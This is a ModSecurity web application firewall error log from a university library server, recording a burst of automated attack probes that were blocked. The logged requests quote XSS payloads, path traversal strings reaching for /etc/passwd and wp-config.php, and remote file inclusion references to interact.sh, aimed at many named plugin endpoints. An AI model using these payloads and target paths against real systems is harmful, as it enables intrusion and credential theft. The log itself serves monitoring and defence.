[Tue Aug 29 11:54:14.114678 2023] [:error] [pid 2653] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-content/plugins/stageshow/stageshow_redirect.php"] [unique_id "ZO159sCo-f0AAApd2F4AAAAi"]
[Tue Aug 29 11:54:14.608259 2023] [:error] [pid 2646] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:s. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22/></ found within ARGS:s: \\x22/></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/"] [unique_id "ZO159sCo-f0AAApWY2gAAAAM"]
[Tue Aug 29 11:54:14.642982 2023] [:error] [pid 2653] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:keyword. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:keyword: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-content/plugins/pdf-generator-for-wp/package/lib/dompdf/vendor/dompdf/dompdf/I18N/Arabic/Examples/Query.php"] [unique_id "ZO159sCo-f0AAApd2GEAAAAi"]
[Tue Aug 29 11:54:14.713407 2023] [:error] [pid 2646] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:TargetService. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:TargetService: /knowage/servlet/AdapterHTTP?Page=LoginPage</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/knowage/servlet/AdapterHTTP"] [unique_id "ZO159sCo-f0AAApWY2sAAAAM"]
[Tue Aug 29 11:54:15.585343 2023] [:error] [pid 2609] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:id: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/comm.php"] [unique_id "ZO1598Co-f0AAAox7R8AAAAN"]
[Tue Aug 29 11:54:16.549419 2023] [:error] [pid 2662] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:var_filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:var_filename: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/viewrq.php"] [unique_id "ZO15@MCo-f0AAApmXtQAAAAp"]
[Tue Aug 29 11:54:16.628484 2023] [:error] [pid 2609] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:prefix. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:prefix: \\x22><script>alert(document.domain);</script><"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/magmi/web/ajax_gettime.php"] [unique_id "ZO15@MCo-f0AAAox7SMAAAAN"]
[Tue Aug 29 11:54:20.924542 2023] [:error] [pid 2647] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:background. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:background: \\x22><script>alert(document.domain)</script><img src=\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/squid.svg"] [unique_id "ZO15-MCo-f0AAApXgcIAAAAU"]
[Tue Aug 29 11:54:21.052969 2023] [:error] [pid 2649] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:first. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:first: HOVER ME!</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/plugins/address_add/add.php"] [unique_id "ZO15-cCo-f0AAApZHUgAAAAf"]
[Tue Aug 29 11:54:21.555552 2023] [:error] [pid 2650] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:wpbase. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:wpbase: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-content/plugins/navis-documentcloud/js/window.php"] [unique_id "ZO15-cCo-f0AAApa-D8AAAAg"]
[Tue Aug 29 11:54:22.894048 2023] [:error] [pid 2661] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: >\\x22>< found within ARGS:page: </script>\\x22><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-content/plugins/sagepay-server-gateway-for-woocommerce/includes/pages/redirect.php"] [unique_id "ZO15-sCo-f0AAApl9@MAAAAo"]
[Tue Aug 29 11:54:23.573711 2023] [:error] [pid 2566] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "perpustakaan.unla.ac.id"] [uri "/sap/bc/BSp/sap/menu/fameset.htm"] [unique_id "ZO15-8Co-f0AAAoGFl0AAAAE"]
[Tue Aug 29 11:54:25.349141 2023] [:error] [pid 2603] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:lp-dismiss-notice. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: xxx<img found within ARGS:lp-dismiss-notice: xxx<img src=x onerror=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO16AcCo-f0AAAor7vcAAAAk"]
[Tue Aug 29 11:54:26.728691 2023] [:error] [pid 2661] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16AsCo-f0AAApl9-gAAAAo"]
[Tue Aug 29 11:54:27.028888 2023] [:error] [pid 2657] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: > found within ARGS:q: <svg/onload=alert(1)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "perpustakaan.unla.ac.id"] [uri "/addons/"] [unique_id "ZO16A8Co-f0AAAph8woAAAAj"]
[Tue Aug 29 11:54:27.582431 2023] [:error] [pid 2716] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:view: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16A8Co-f0AAAqci5oAAAAv"]
[Tue Aug 29 11:54:29.798446 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:v. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:v: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-content/plugins/hero-maps-pro/views/dashboard/index.php"] [unique_id "ZO16BcCo-f0AAAqY544AAAAr"]
[Tue Aug 29 11:54:31.551613 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:what. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:\\x22\\x5c found within ARGS:what: {\\x22call_action\\x22:\\x22x\\x22,\\x22more_data\\x22:\\x22\\x5cu003cscript>alert(document.domain)\\x5cu003c/script>\\x22}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO16B8Co-f0AAAqSwiQAAAAN"]
[Tue Aug 29 11:54:31.660312 2023] [:error] [pid 2503] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:page: \\x22><img src onerror=alert(document.domain) x"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-content/plugins/members-list/admin/view/user.php"] [unique_id "ZO16B8Co-f0AAAnHQyIAAAAT"]
[Tue Aug 29 11:54:32.928086 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '></ found within ARGS:filename: filename'></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-content/plugins/import-legacy-media/getid3/demos/demo.mimeonly.php"] [unique_id "ZO16CMCo-f0AAAqSwigAAAAN"]
[Tue Aug 29 11:54:33.559663 2023] [:error] [pid 2717] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:view: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16CcCo-f0AAAqdbl4AAAAw"]
[Tue Aug 29 11:54:34.611053 2023] [:error] [pid 2591] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:var_url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:var_url: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/ecrire/"] [unique_id "ZO16CsCo-f0AAAofnEQAAAAX"]
[Tue Aug 29 11:54:35.544925 2023] [:error] [pid 2717] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:stack. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:stack: \\x0a<script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/__nuxt_error"] [unique_id "ZO16C8Co-f0AAAqdbmIAAAAw"]
[Tue Aug 29 11:54:35.674254 2023] [:error] [pid 2716] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:page: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-content/plugins/adminimize/adminimize_page.php"] [unique_id "ZO16C8Co-f0AAAqci60AAAAv"]
[Tue Aug 29 11:54:35.701942 2023] [:error] [pid 2708] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../ found within ARGS:view: ../../../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16C8Co-f0AAAqUB2sAAAAb"]
[Tue Aug 29 11:54:36.541407 2023] [:error] [pid 2656] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:settings[41]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: > found within ARGS:settings[41]: <body onload=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO16DMCo-f0AAApgA0cAAAAH"]
[Tue Aug 29 11:54:38.048827 2023] [:error] [pid 2503] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:tab. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:tab: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-admin/admin.php"] [unique_id "ZO16DsCo-f0AAAnHQy0AAAAT"]
[Tue Aug 29 11:54:39.535393 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:path: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-content/plugins/wp-source-control/downloadfiles/download.php"] [unique_id "ZO16D8Co-f0AAAolKi8AAAAe"]
[Tue Aug 29 11:54:40.068377 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: collections_remove_stale: Failed deleting collection (name "ip", key "172.28.0.1_d7f9fdf39193610aaa5fc6cb072e72086210c23b"): Internal error [hostname "perpustakaan.unla.ac.id"] [uri "/wp-content/plugins/wp-source-control/downloadfiles/download.php"] [unique_id "ZO16D8Co-f0AAAolKi8AAAAe"]
[Tue Aug 29 11:54:40.535598 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:year. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ')</ found within ARGS:year: 2021</title><script>alert('2Ue0HImbmoU7CZyArPbLLDsM9Y5')</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/cgi/cal"] [unique_id "ZO16EMCo-f0AAAqSwjgAAAAN"]
[Tue Aug 29 11:54:41.553165 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:stamp. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:stamp: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/KeepAlive.jsp"] [unique_id 